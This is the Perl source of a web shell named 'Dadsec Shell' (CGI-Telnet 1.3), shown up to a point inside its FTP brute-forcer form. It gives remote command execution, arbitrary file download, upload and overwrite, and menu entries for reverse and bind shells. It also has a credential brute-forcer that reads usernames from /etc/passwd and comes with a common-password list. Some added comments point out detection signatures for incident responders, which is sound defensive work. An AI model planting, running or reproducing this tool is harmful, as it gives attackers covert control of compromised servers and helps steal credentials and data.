#!/usr/bin/perl -I/usr/local/bandmin
use MIME::Base64;
# Banner string for the tool. The literal "CGI-Telnet Version 1.3" is a stable
# content signature when scanning web roots for this file.
$Version= "CGI-Telnet Version 1.3";
# Styled operator handle that PrintPageHeader interpolates into the page header.
$EditPersion="<font style='text-shadow: 0px 0px 6px rgb(255 149 41), 0px 0px 5px rgb(46 255 41), 0px 0px 5px rgb(0 0 0);color:#ffffff;font-weight:bold;'>Dadsec</font>";

# Access password: compared against the submitted value in PerformLogin and
# echoed back in the SAVEDPWD cookie. It is a hard-coded literal, and the login
# screen in this file also prints it, so it does not restrict access in practice.
$Password = "dadsec";
# Returns 1 when the SERVER_SOFTWARE CGI variable contains "win"
# (case-insensitive), otherwise 0. The trimmed value is also left in the
# global $os. The test is a plain substring match on the server banner.
sub Is_Win(){
	$os = &trim($ENV{"SERVER_SOFTWARE"});
	if($os =~ m/win/i){	return 1;}else{return 0;}}
# Platform switch, computed once from the server banner by Is_Win().
$WinNT = &Is_Win();
# Statement separators used when several commands are chained into one
# command line for the platform shell.
$NTCmdSep = "&";
$UnixCmdSep = ";";
# Value passed to alarm() in RunCmd on non-Windows hosts (alarm counts seconds).
$CommandTimeoutDuration = 10000;
# When true, RunCmd opens the command as a pipe and collects its output.
$ShowDynamicOutput = 1;	
# Platform-specific pieces selected from $WinNT: the separator, the command that
# prints the working directory, the path separator, and the redirection suffix
# that RunCmd appends to every command line.
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
# Size of the <textarea> elements used to show command output and file contents.
$cols= 150;
$rows= 26;
# Parses the incoming CGI request into the package variables $in, @in and %in.
# GET requests are read from QUERY_STRING, POST requests from STDIN. A
# multipart/form-data body is treated as a single file upload followed by
# ordinary fields; anything else is parsed as URL-encoded key=value pairs.
# Every value stored in %in comes straight from the HTTP request with no
# validation.
sub ReadParse 
{	local (*in) = @_ if @_;
	local ($i, $loc, $key, $val);
	
	# True when the request declares a multipart body; $1 holds the boundary.
	$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;

	if($ENV{'REQUEST_METHOD'} eq "GET")
	{
		$in = $ENV{'QUERY_STRING'};
	}
	elsif($ENV{'REQUEST_METHOD'} eq "POST")
	{
		# Binary mode keeps uploaded bytes intact on Windows.
		binmode(STDIN) if $MultipartFormData & $WinNT;
		read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
	}
	if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
	{
		# The client-supplied boundary is interpolated into the split pattern
		# as a regular expression, without quoting.
		$Boundary = '--'.$1;
		@list = split(/$Boundary/, $in); 
		# The first part is taken to be the uploaded file: headers up to the
		# first blank line, body after it.
		$HeaderBody = $list[1];
		$HeaderBody =~ /\r\n\r\n|\n\n/;
		$Header = $`;
		$Body = $';
 		$Body =~ s/\r\n$//;
		$in{'filedata'} = $Body;
		# Client-supplied file name, with quotes and whitespace removed.
		$Header =~ /filename=\"(.+)\"/; 
		$in{'f'} = $1; 
		$in{'f'} =~ s/\"//g;
		$in{'f'} =~ s/\s//g;

		# Remaining parts are plain form fields: the quoted name becomes the
		# key, the rest of the part (percent-decoded) becomes the value.
		for($i=2; $list[$i]; $i++)
		{ 
			$list[$i] =~ s/^.+name=$//;
			$list[$i] =~ /\"(\w+)\"/;
			$key = $1;
			$val = $';
			$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
			$val =~ s/%(..)/pack("c", hex($1))/ge;
			$in{$key} = $val; 
		}
	}
	else
	{
		# URL-encoded form: "+" becomes a space, %XX sequences are decoded,
		# and repeated keys are joined with a NUL byte.
		@in = split(/&/, $in);
		foreach $i (0 .. $#in)
		{
			$in[$i] =~ s/\+/ /g;
			($key, $val) = split(/=/, $in[$i], 2);
			$key =~ s/%(..)/pack("c", hex($1))/ge;
			$val =~ s/%(..)/pack("c", hex($1))/ge;
			$in{$key} .= "\0" if (defined($in{$key}));
			$in{$key} .= $val;
		}
	}
}
sub PrintPageHeader
{
	$EncodedCurrentDir = $CurrentDir;
	$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
	my $dir =$CurrentDir;
	$dir=~ s/\\/\\\\/g;
	print "Content-type: text/html\n\n";
	print <<END;
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Dadsec Shell</title>

$HtmlMetaHeader

</head>
<style>
body{
font: 10pt Verdana;
}
tr {
BORDER-RIGHT:  #ef1c1c57 1px solid;
BORDER-TOP:    #ef1c1c57 1px solid;
BORDER-LEFT:   #ef1c1c57 1px solid;
BORDER-BOTTOM: #ef1c1c57 1px solid;
color: #fff;
}
td {
BORDER-RIGHT:  #ef1c1c57 1px solid;
BORDER-TOP:    #ef1c1c57 1px solid;
BORDER-LEFT:   #ef1c1c57 1px solid;
BORDER-BOTTOM: #ef1c1c57 1px solid;
color: #fff;
font: 10pt Verdana;
}

table {
BORDER-RIGHT:  #ef1c1c57 1px solid;
BORDER-TOP:    #ef1c1c57 1px solid;
BORDER-LEFT:   #ef1c1c57 1px solid;
BORDER-BOTTOM: #ef1c1c57 1px solid;
BACKGROUND-COLOR: #111;
}


input {
BORDER-RIGHT:  #ef1c1c57 1px solid;
BORDER-TOP:    #ef1c1c57 1px solid;
BORDER-LEFT:   #ef1c1c57 1px solid;
BORDER-BOTTOM: #ef1c1c57 1px solid;
BACKGROUND-COLOR: Black;
font: 10pt Verdana;
color: #fff;
}

input.submit {
text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
color: #FFFFFF;
border-color: #009900;
}

code {
border			: dashed 0px #333;
border-style:dashed;
BACKGROUND-COLOR: Black;
font: 10pt Verdana bold;
color: while;
}

run {
border			: dashed 0px #333;
border-style:dashed;
font: 10pt Verdana bold;
color: #FF00AA;
}

textarea {
BORDER-RIGHT:  #ef1c1c57 1px solid;
BORDER-TOP:    #ef1c1c57 1px solid;
BORDER-LEFT:   #ef1c1c57 1px solid;
BORDER-BOTTOM: #ef1c1c57 1px solid;
BACKGROUND-COLOR: #1b1b1b;
border-style:dashed;
font: Fixedsys bold;
color: #aaa;
}
A:link {
	COLOR: #fff; TEXT-DECORATION: none
}
A:visited {
	COLOR: #fff; TEXT-DECORATION: none
}
A:hover {
	text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
	color: #fff; TEXT-DECORATION: none
}
A:active {
	color: Red; TEXT-DECORATION: none
}

.listdir tr:hover{
	background: #444;
}
.listdir tr:hover td{
	background: #444;
	text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
	color: #FFFFFF; TEXT-DECORATION: none;
}
.notline{
	background: #111;
}
.line{
	background: #ef1c1c38;
}
</style>
<script language="javascript">
function chmod_form(i,file)
{
	/*var ajax='ajax_PostData("FormPerms_'+i+'","$ScriptLocation","ResponseData"); return false;';*/
	var ajax="";
	document.getElementById("FilePerms_"+i).innerHTML="<form name=FormPerms_" + i+ " action=' method='POST'><input id=text_" + i + "  name=chmod type=text size=5 /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
	document.getElementById("text_" + i).focus();
}
function rm_chmod_form(response,i,perms,file)
{
	response.innerHTML = "<span onclick=\\\"chmod_form(" + i + ",'"+ file+ "')\\\" >"+ perms +"</span></td>";
}
function rename_form(i,file,f)
{
	var ajax="";
	f.replace(/\\\\/g,"\\\\\\\\");
	var back="rm_rename_form("+i+",\\\""+file+"\\\",\\\""+f+"\\\"); return false;";
	document.getElementById("File_"+i).innerHTML="<form name=FormPerms_" + i+ " action=' method='POST'><input id=text_" + i + "  name=rename type=text value= '"+file+"' /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=submit class='submit' onclick='" + back + "' value=Cancel><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
	document.getElementById("text_" + i).focus();
}
function rm_rename_form(i,file,f)
{
	if(f=='f')
	{
		document.getElementById("File_"+i).innerHTML="<a href='?a=command&d=$dir&c=edit%20"+file+"%20'>" +file+ "</a>";
	}else
	{
		document.getElementById("File_"+i).innerHTML="<a href='?a=gui&d="+f+"'>[ " +file+ " ]</a>";
	}
}
</script>
<body onLoad="document.f.@_.focus()" bgcolor="#0c0c0c" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<center><code>
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<tr>
	<td align="center" rowspan=2>
		<b><font size="5">$EditPersion</font></b>
	</td>

	<td>

		<font face="Verdana" size="2">$ENV{"SERVER_SOFTWARE"}</font>
	</td>
	<td>Server IP:<font color="green"> $ENV{'SERVER_ADDR'}</font> | Your IP: <font color="green">$ENV{'REMOTE_ADDR'}</font>
	</td>

</tr>

<tr>
<td colspan="3"><font face="Verdana" size="2">
<a href="$ScriptLocation">Home</a> | 
<a href="$ScriptLocation?a=command&d=$EncodedCurrentDir">Command</a> |
<a href="$ScriptLocation?a=gui&d=$EncodedCurrentDir">GUI</a> | 
<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> | 
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |

<a href="$ScriptLocation?a=backbind">Back & Bind</a> |
<a href="$ScriptLocation?a=bruteforcer">Brute Forcer</a> |
<a href="$ScriptLocation?a=checklog">Check Log</a> |
<a href="$ScriptLocation?a=domainsuser">Domains/Users</a> |
<a href="$ScriptLocation?a=logout">Logout</a> |
<a target='_blank' href="#">Help</a>

</font></td>
</tr>
</table>
<font id="ResponseData" color="#fff" >
END
}
sub PrintLoginScreen
{

	print <<END;
<pre><script type="text/javascript">
TypingText = function(element, interval, cursor, finishedCallback) {
  if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
    this.running = true;	// Never run.
    return;
  }
  this.element = element;
  this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  this.interval = (typeof interval == "undefined" ? 100 : interval);
  this.origText = this.element.innerHTML;
  this.unparsedOrigText = this.origText;
  this.cursor = (cursor ? cursor : "");
  this.currentText = "";
  this.currentChar = 0;
  this.element.typingText = this;
  if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  TypingText.all.push(this);
  this.running = false;
  this.inTag = false;
  this.tagBuffer = "";
  this.inHTMLEntity = false;
  this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
  for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
  if(this.running) return;
  if(typeof this.origText == "undefined") {
    setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);	// We haven't finished loading yet.  Have patience.
    return;
  }
  if(this.currentText == "") this.element.innerHTML = "";
//  this.origText = this.origText.replace(/<([^<])*>/, "");     // Strip HTML from text.
  if(this.currentChar < this.origText.length) {
    if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
      this.tagBuffer = "<";
      this.inTag = true;
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
      this.tagBuffer += ">";
      this.inTag = false;
      this.currentText += this.tagBuffer;
      this.currentChar++;
      this.run();
      return;
    } else if(this.inTag) {
      this.tagBuffer += this.origText.charAt(this.currentChar);
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
      this.HTMLEntityBuffer = "&";
      this.inHTMLEntity = true;
      this.currentChar++;
      this.run();
      return;
    } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
      this.HTMLEntityBuffer += ";";
      this.inHTMLEntity = false;
      this.currentText += this.HTMLEntityBuffer;
      this.currentChar++;
      this.run();
      return;
    } else if(this.inHTMLEntity) {
      this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
      this.currentChar++;
      this.run();
      return;
    } else {
      this.currentText += this.origText.charAt(this.currentChar);
    }
    this.element.innerHTML = this.currentText;
    this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
    this.currentChar++;
    setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  } else {
	this.currentText = "";
	this.currentChar = 0;
        this.running = false;
        this.finishedCallback();
  }
}
</script>
</pre>

<div style="font-weight:800;letter-spacing:-0.025em;color:white;font-size:4.25rem;line-height:2.5rem;font-family:system-ui,Segoe UI Emoji;">Dadsec Shell</div><br><br><div style="font-weight:800;letter-spacing:-0.025em;color:green;font-size:2rem;line-height:2.5rem;font-family:system-ui,Segoe UI Emoji;">Pass: dadsec</div><br>
<table align="center" border="1"  border-style="dashed" width="600" heigh>
<tbody><tr>
<td valign="top" background="http://dl.dropbox.com/u/10860051/images/matran.gif"><p id="hack" style="margin-left: 3px;">
<font color="#009900"> Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font> <br>

<font color="#009900"> Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br>
<font color="#F00000"><font color="#FFF000">~\$</font> Connected ! </font><br>
<font color="#009900"><font color="#FFF000">$ServerName~</font> Checking Server . . . . . . . . . . . . . . . . . . .</font> <br>

<font color="#009900"><font color="#FFF000">$ServerName~</font> Trying connect to Command . . . . . . . . . . .</font><br>

<font color="#F00000"><font color="#FFF000">$ServerName~</font>\$ Connected Command! </font><br>
<font color="#009900"><font color="#FFF000">$ServerName~<font color="#F00000">\$</font></font> OK! You can kill it!</font>
</tr>
</tbody></table>
<br>

<script type="text/javascript">
new TypingText(document.getElementById("hack"), 30, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
TypingText.runAll();

</script>
END
}
sub HtmlSpecialChars($){
	# Return a copy of the argument with the five HTML-significant characters
	# (& " ' < >) replaced by their entity forms, so the text is displayed
	# rather than parsed as markup.
	my ($raw) = @_;
	my %entity_for = (
		'&' => '&amp;',
		'"' => '&quot;',
		"'" => '&#039;',
		'<' => '&lt;',
		'>' => '&gt;',
	);
	# Single pass: each special character is mapped exactly once, so the
	# ampersands introduced by the replacements are never escaped again.
	(my $escaped = $raw) =~ s/([&"'<>])/$entity_for{$1}/g;
	return $escaped;
}
# Builds a breadcrumb for the global $CurrentDir: one <a> element per path
# component, each linking to "?a=<action>&d=<path up to that component>".
# The argument is the action name placed in the "a" parameter.
# Path components are concatenated into the markup as-is, with no HTML or URL
# encoding.
sub AddLinkDir($)
{
	my $ac=shift;
	my @dir=();
	# Split on the platform's path separator.
	if($WinNT)
	{
		@dir=split(/\\/,$CurrentDir);
	}else
	{
		@dir=split("/",&trim($CurrentDir));
	}
	my $path="";
	my $result="";
	foreach (@dir)
	{
		# $path accumulates the prefix so each link targets its own level.
		$path .= $_.$PathSep;
		$result.="<a href='?a=".$ac."&d=".$path."'>".$_.$PathSep."</a>";
	}
	return $result;
}
# Prints the fixed "Login incorrect" notice shown after a wrong password.
sub PrintLoginFailedMessage
{
	print <<END;
Password:<br>
Login incorrect<br><br>
END
}
# Prints the login form. It posts to $ScriptLocation with a=login and the
# password in field "p".
sub PrintLoginForm
{
	print <<END;
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="login">
Password:<input type="password" name="p">
<input class="submit" type="submit" value="Enter">
</form>
END
}
# Prints the closing tags that match the elements opened by PrintPageHeader.
sub PrintPageFooter
{
	print "<br></code></center></body></html>";
}
# Parses the HTTP_COOKIE request header into the global hash %Cookies
# (cookie name => value). Pairs are split on "; " and then on "=".
sub GetCookies
{
	@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
	foreach $cookie(@httpcookies)
	{
		($id, $val) = split(/=/, $cookie);
		$Cookies{$id} = $val;
	}
}
# Prints the fixed logout notice.
sub PrintLogoutScreen
{
	print "Connection closed by foreign host.<br><br>";
}
# Ends the session: overwrites the SAVEDPWD cookie with an empty value,
# renders the logout notice followed by the login page, and exits.
sub PerformLogout
{
	# Header line; it must be printed before PrintPageHeader emits the body.
	print "Set-Cookie: SAVEDPWD=;\n"; 
	&PrintPageHeader("p");
	&PrintLogoutScreen;

	&PrintLoginScreen;
	&PrintLoginForm;
	&PrintPageFooter;
	exit;
}
# Compares the submitted password ($LoginPassword) with the hard-coded
# $Password. On a match the password itself is written to the SAVEDPWD cookie
# in clear text and the directory listing is shown; otherwise the login page
# is rendered again and the script exits.
# For responders: a Set-Cookie / Cookie header named SAVEDPWD on traffic to a
# CGI script is a network-level indicator of this tool.
sub PerformLogin 
{
	if($LoginPassword eq $Password) 
	{
		print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
		&PrintPageHeader;
		print &ListDir;
	}
	else
	{
		&PrintPageHeader("p");
		&PrintLoginScreen;
		# The failure notice is shown only when a password was submitted.
		if($LoginPassword ne "") 
		{
			&PrintLoginFailedMessage;

		}
		&PrintLoginForm;
		&PrintPageFooter;
		exit;
	}
}
# Returns (does not print) the HTML form used to submit a command line.
# The form posts a=command, the current directory in "d" and the command text
# in "c" to $ScriptLocation. Sets the global $Prompt as a side effect.
# $CurrentDir is interpolated into the markup without escaping.
sub PrintCommandLineInputForm
{
	my $dir= "<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("command")."</span>";
	$Prompt = $WinNT ? "$dir > " : "<font color='green'>[admin\@$ServerName $dir]\$</font> ";
	return <<END;
<form name="f" method="POST" action="$ScriptLocation">

<input type="hidden" name="a" value="command">

<input type="hidden" name="d" value="$CurrentDir">
$Prompt
<input type="text" size="40" name="c">
<input class="submit"type="submit" value="Enter">
</form>
END
}
# Returns the HTML form that asks for a file name to download. It posts
# a=download with the current directory in "d" and the file name in "f".
# Sets the global $Prompt as a side effect.
sub PrintFileDownloadForm
{
	my $dir = &AddLinkDir("download"); 
	$Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
	return <<END;
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input class="file" type="text" name="f" size="35"><br><br>
Download: <input class="submit" type="submit" value="Begin">

</form>
END
}
# Returns the multipart upload form. It posts a=upload, the file in field "f",
# the target directory in "d" and an optional o=overwrite flag.
# Sets the global $Prompt as a side effect.
sub PrintFileUploadForm
{
	my $dir= &AddLinkDir("upload");
	$Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
	return <<END;
<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input class="file" type="file" name="f" size="35"><br><br>
Options: &nbsp;<input type="checkbox" name="o" id="up" value="overwrite">
<label for="up">Overwrite if it Exists</label><br><br>
Upload:&nbsp;&nbsp;&nbsp;<input class="submit" type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input class="submit" type="hidden" name="a" value="upload">

</form>

END
}
# SIGALRM handler installed by RunCmd on non-Windows hosts. It cancels any
# pending alarm and returns an HTML fragment reporting the timeout; on Windows
# the body is skipped entirely.
sub CommandTimeout
{
	if(!$WinNT)
	{
		alarm(0);
		return <<END;
</textarea>
<br><font color=yellow>
Command exceeded maximum time of $CommandTimeoutDuration second(s).</font>
<br><font size='6' color=red>Killed it!</font>
END
	}
}

# Builds the intermediate "download starting" page for the given path.
# If the file exists, the path is percent-encoded, a meta-refresh to
# "?a=download&f=<path>&o=go" is placed in $HtmlMetaHeader, the page header is
# printed, and the returned HTML contains a manual link plus the command form.
# If it does not exist, the returned HTML holds an error and the download form.
sub PrintDownloadLinkPage
{
	local($FileUrl) = @_;
	my $result="";
	if(-e $FileUrl)
	{
		# Encode every non-alphanumeric byte as %XX for use in the URL.
		$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
		$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
		$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
		&PrintPageHeader("c");
		$result .= <<END;
Sending File $TransferFile...<br>

If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>
END
		$result .= &PrintCommandLineInputForm;
	}
	else
	{
		$result .= "Failed to download $FileUrl: $!";
		$result .= &PrintFileDownloadForm;
	}
	return $result;
}
# Streams the file at the given path to the client as an attachment and exits.
# The path comes from request parameters and is opened without any restriction
# on location, so any file readable by the web server account can be returned.
# When the open fails, an error message and the download form are returned.
sub SendFileToBrowser
{
	my $result = "";
	local($SendFile) = @_;
	# Two-argument open on a request-derived path.
	if(open(SENDFILE, $SendFile))
	{
		if($WinNT)
		{
			binmode(SENDFILE);
			binmode(STDOUT);
		}
		$FileSize = (stat($SendFile))[7];
		# Capture the last path component in $1 for the attachment name.
		($Filename = $SendFile) =~  m!([^/^\\]*)$!;
		print "Content-Type: application/x-unknown\n";
		print "Content-Length: $FileSize\n";
		print "Content-Disposition: attachment; filename=$1\n\n";
		print while(<SENDFILE>);
		close(SENDFILE);
		exit(1);
	}
	else
	{
		$result .= "Failed to download $SendFile: $!";
		$result .=&PrintFileDownloadForm;
	}
	return $result;
}
# Resolves $TransferFile to a full path in the global $TargetFile and hands it
# to the download routines. An absolute path (leading "\" or a drive letter on
# Windows, leading "/" elsewhere) is used unchanged; a relative one is appended
# to $CurrentDir. With $Options equal to "go" the file is streamed, otherwise
# the intermediate link page is built. Mirrors the path logic of DownloadFile.
sub BeginDownload
{
	# Note: "&" and "|" here are the bitwise operators applied to match results.
	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
		(!$WinNT & ($TransferFile =~ m/^\//)))
	{
		$TargetFile = $TransferFile;
	}
	else
	{
		# Drop one trailing separator from the directory before joining.
		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
		$TargetFile .= $PathSep.$TransferFile;
	}

	if($Options eq "go") 
	{
		&SendFileToBrowser($TargetFile);
	}
	else
	{
		&PrintDownloadLinkPage($TargetFile);
	}
}
# Handles the upload action. With no file name it returns the upload form.
# Otherwise it writes the request body stored in $in{'filedata'} to
# <$CurrentDir>/<last component of the client file name> and returns a status
# message followed by the command form. An existing file is replaced only when
# $Options is "overwrite".
# For responders: this is a write primitive into any directory the web server
# account can write to; files created through it are owned by that account.
sub UploadFile
{
	if($TransferFile eq "")
	{
		return &PrintFileUploadForm;

	}
	my $result="";
	$result .= "Uploading $TransferFile to $CurrentDir...<br>";

	# Target = current directory (one trailing separator dropped) + base name.
	chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
	$TransferFile =~ m!([^/^\\]*)$!;
	$TargetName .= $PathSep.$1;

	$TargetFileSize = length($in{'filedata'});
	if(-e $TargetName && $Options ne "overwrite")
	{
		$result .= "Failed: Destination file already exists.<br>";
	}
	else
	{
		# Two-argument open with the mode embedded in the request-derived name.
		if(open(UPLOADFILE, ">$TargetName"))
		{
			binmode(UPLOADFILE) if $WinNT;
			print UPLOADFILE $in{'filedata'};
			close(UPLOADFILE);
			$result .= "Transfered $TargetFileSize Bytes.<br>";
			$result .= "File Path: $TargetName<br>";
		}
		else
		{
			$result .= "Failed: $!<br>";
		}
	}
	$result .= &PrintCommandLineInputForm;
	return $result;
}
# Handles the download action. With no file name it prints the page header and
# returns the download form. Otherwise it resolves $TransferFile against
# $CurrentDir (absolute paths are used unchanged) and returns the result of
# streaming the file ($Options eq "go") or of building the link page.
sub DownloadFile
{
	if($TransferFile eq "")
	{
		&PrintPageHeader("f");
		return &PrintFileDownloadForm;
	}
	
	# Note: "&" and "|" here are the bitwise operators applied to match results.
	if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//)))
	{
		$TargetFile = $TransferFile;
	}
	else 
	{
		# Drop one trailing separator from the directory before joining.
		chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
		$TargetFile .= $PathSep.$TransferFile;
	}

	if($Options eq "go") 
	{
		return &SendFileToBrowser($TargetFile);
	}
	else
	{
		return &PrintDownloadLinkPage($TargetFile);
	}
}
# Dispatches the submitted command line in the global $RunCommand and returns
# the resulting HTML:
#   "cd <dir>"   - resolves the new directory through the system shell, stores
#                  it in $CurrentDir, then lists that directory;
#   "edit <file>" - returns the file editor form (SaveFileForm);
#   anything else - is passed to RunCmd and its output shown in a textarea.
# $RunCommand and $CurrentDir come from request parameters and are placed into
# shell command strings and HTML without validation or escaping.
sub ExecuteCommand
{
	my $result="";
	if($RunCommand =~ m/^\s*cd\s+(.+)/)
	{
		# Backticks run the chained cd/pwd through the shell; the last output
		# character (the newline) is removed with chop.
		$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
		chop($CurrentDir = `$Command`);
		$result .= &PrintCommandLineInputForm;

		$result .= "Command: <run>$RunCommand </run><br><textarea cols='$cols' rows='$rows' spellcheck='false'>";
		$RunCommand= $WinNT?"dir":"dir -lia";
		$result .= &RunCmd;
	}elsif($RunCommand =~ m/^\s*edit\s+(.+)/)
	{
		$result .=  &SaveFileForm;
	}else
	{
		$result .= &PrintCommandLineInputForm;
		$result .= "Command: <run>$RunCommand</run><br><textarea id='data' cols='$cols' rows='$rows' spellcheck='false'>";
		$result .=&RunCmd;
	}
	$result .=  "</textarea>";
	return $result;
}

# Runs the command line held in the global $RunCommand inside $CurrentDir and
# returns its HTML-escaped output. The command string is assembled by plain
# concatenation and executed by the system shell with the privileges of the
# web server account.
# For responders: on the host this appears as a shell or command interpreter
# started as a child of the web server's CGI/Perl process.
sub RunCmd
{
	my $result="";
	$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
	if(!$WinNT)
	{
		# Arm the timeout handler (non-Windows only).
		$SIG{'ALRM'} = \&CommandTimeout;
		alarm($CommandTimeoutDuration);
	}
	if($ShowDynamicOutput) 
	{
		# Unbuffered output while the command runs; the trailing " |" makes the
		# two-argument open start the command and read from its output.
		$|=1;
		$Command .= " |";
		open(CommandOutput, $Command);
		while(<CommandOutput>)
		{
			# Normalise line endings, then escape for display in the textarea.
			$_ =~ s/(\n|\r\n)$//;
			$result .= &HtmlSpecialChars("$_\n");
		}
		$|=0;
	}
	else
	{
		# Single-quoted argument: the literal text is escaped and returned;
		# no command is run in this branch.
		$result .= &HtmlSpecialChars('$Command');
	}
	if(!$WinNT)
	{
		alarm(0);
	}
	return $result;
}
# Builds the file editor page for an "edit <file>" command. The first five
# characters of $RunCommand are removed to obtain the file name, the file's
# contents are read by running "type"/"less" through RunCmd, and the result is
# placed in a textarea inside a form whose "save" button posts the edited
# data back. A "Permission denied" notice is added when the file is not
# writable. Sets the globals $save, $File, $msg, $rows, $Prompt, $read and
# overwrites $RunCommand.
sub SaveFileForm
{
	my $result ="";
	substr($RunCommand,0,5)="";
	my $file=&trim($RunCommand);
	$save='<br><input name="a" type="submit" value="save" class="submit" >';
	$File=$CurrentDir.$PathSep.$RunCommand;
	my $dir="<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("gui")."</span>";
	if(-w $File)
	{
		$rows="23"
	}else
	{
		$msg="<br><font style='font: 15pt Verdana; color: yellow;' > Permission denied!<font><br>";
		$rows="20"
	}
	$Prompt = $WinNT ? "$dir > " : "<font color='#FFFFFF'>[admin\@$ServerName $dir]\$</font> ";
	# The file is read through the shell rather than with open().
	$read=($WinNT)?"type":"less";
	$RunCommand = "$read \"$RunCommand\"";
	$result .=  <<END;
	<form name="f" method="POST" action="$ScriptLocation">

	<input type="hidden" name="d" value="$CurrentDir">
	$Prompt
	<input type="text" size="40" name="c">
	<input name="s" class="submit" type="submit" value="Enter">
	<br>Command: <run> $RunCommand </run>
	<input type="hidden" name="file" value="$file" > $save <br> $msg
	<br><textarea id="data" name="data" cols="$cols" rows="$rows" spellcheck="false">
END
	
	$result .= &RunCmd;
	$result .=  "</textarea>";
	$result .=  "</form>";
	return $result;
}
# Writes the first argument (file contents) to <$CurrentDir>/<second argument>
# and returns 1 on success, 0 when the file cannot be opened. The declared
# prototype names one parameter although the body reads two.
# The file name is request-derived and joined to the directory without checks,
# so this overwrites any file the web server account may write.
sub SaveFile($)
{
	my $Data= shift ;
	my $File= shift;
	$File=$CurrentDir.$PathSep.$File;
	if(open(FILE, ">$File"))
	{
		binmode FILE;
		print FILE $Data;
		close FILE;
		return 1;
	}else
	{
		return 0;
	}
}
sub BruteForcerForm
{
	my $result="";
	$result .= <<END;

<table>

<tr>
<td colspan="2" align="center">
####################################<br>
Simple FTP brute forcer<br>
####################################
<form name="f" method="POST" action="$ScriptLocation">

<input type="hidden" name="a" value="bruteforcer"/>
</td>
</tr>
<tr>
<td>User:<br><textarea rows="18" cols="30" name="user">
END
chop($result .= `less /etc/passwd | cut -d: -f1`);
$result .= <<'END';
</textarea></td>
<td>

Pass:<br>
<textarea rows="18" cols="30" name="pass">123pass
123!@#
123admin
123abc
123456admin
1234554321
12344321
pass123
admin
admincp
administrator
matkhau
passadmin
p@ssword
p@ssw0rd
password
123456
1234567
12345678
123456789
1234567890
111111
000000
222222
333333
444444
555555
666666
777777
888888
999999
123123
234234
345345
456456
567567
678678
789789
123321
456654
654321
7654321
87654321
987654321
0987654321
admin123
admin123456
abcdef
abcabc
!@#!@#
!@#$%^
!@#$%^&*(
!@#$$#@!
abc123
anhyeuem
iloveyou</textarea>
